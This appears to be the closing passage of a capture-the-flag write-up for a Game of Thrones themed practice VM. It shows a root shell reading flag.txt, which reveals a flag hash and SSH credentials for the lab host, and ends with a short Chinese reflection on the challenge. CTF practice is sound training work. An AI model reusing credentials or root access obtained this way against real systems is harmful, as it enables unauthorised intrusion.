|____/|_| |__,|_ |___|_|_|_ |_|__,|___|___|
|___| |___|
_
_____|_|___ ___
| | | | -_|
|_|_|_|_|_|_|___|
root@1558d33076eb:~## ls
flag.txt
root@1558d33076eb:~## cat flag.txt
Congratulations.
You've found the secret flag of Dragonglass mine. This is your flag: a8db1d82db78ed452ba0882fb9554fc9
Now you have the Dragonglass weapons to fight against the White Walkers.
Host's ssh:
branstark/Th3_Thr33_Ey3d_Raven
"The time has come" - The Three Eyed Raven
|
心得
这个环境很实战,在很多场景感觉都有复现,里面的加解密我花了很多时间。
